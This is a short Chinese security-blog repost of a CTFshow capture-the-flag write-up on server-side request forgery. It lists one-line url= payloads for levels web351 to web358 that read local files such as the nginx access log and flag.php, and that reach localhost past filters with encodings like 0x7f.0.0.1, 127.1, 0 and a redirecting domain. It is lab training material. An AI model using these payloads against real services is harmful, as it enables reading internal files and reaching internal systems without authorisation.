【原创】CTFshow—SSRF

admin 2022年12月3日16:37:37安全博客 CTF专场评论30 views331字阅读1分6秒阅读模式

[huayang]

web351

【原创】CTFshow—SSRF

尝试读一下日志文件

url=file:///var/log/nginx/access.log
【原创】CTFshow—SSRF
url=file:///var/www/html/flag.php
【原创】CTFshow—SSRF

方法二

url=http://127.0.0.1/flag.php
【原创】CTFshow—SSRF

web352

【原创】CTFshow—SSRF
【原创】CTFshow—SSRF

web352

【原创】CTFshow—SSRF
url=http:/0x7f.0.0.1/flag.php

web354

【原创】CTFshow—SSRF
url=http://sudo.cc/flag.php

web355

【原创】CTFshow—SSRF
url=http://127.1/flag.php

web356

【原创】CTFshow—SSRF
url=http://0/flag.php

web358

【原创】CTFshow—SSRF
url=http://[email protected]/flag.php?.show

[/huayang]

FROM:浅浅淡淡[hellohy]

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:37:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【原创】CTFshow—SSRF http://cn-sec.com/archives/1443004.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: